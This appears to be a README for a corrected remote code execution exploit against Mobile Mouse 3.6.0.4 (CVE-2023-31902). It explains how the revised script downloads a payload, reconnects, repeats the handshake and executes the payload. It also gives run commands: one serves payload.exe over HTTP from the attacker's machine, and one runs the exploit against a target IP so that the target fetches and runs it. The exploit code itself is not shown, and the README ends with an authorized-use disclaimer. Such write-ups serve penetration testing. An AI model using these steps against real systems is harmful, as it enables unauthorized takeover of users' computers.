A corrected version of the Mobile Mouse 3.6.0.4 remote code execution exploit published as EDB-51010.
- CVE: CVE-2023-31902
- Affected version: Mobile Mouse 3.6.0.4
- Default port: TCP/9099
The original exploit successfully downloads the payload but may fail to execute it because both stages use the same TCP connection.
This version:
- Downloads the payload through the first session
- Waits for the download to complete
- Opens a fresh connection
- Repeats the Mobile Mouse handshake
- Executes the downloaded payload
It also uses sendall(), properly escaped Windows paths, socket timeouts, and basic error handling.
Start an HTTP server in the payload directory:
python3 -m http.server 8080Run the exploit:
python3 exploit.py \
--target 192.168.1.50 \
--lhost 192.168.1.10 \
--file payload.exeThis project is intended only for authorized security testing and educational research. Do not use it against systems without explicit permission.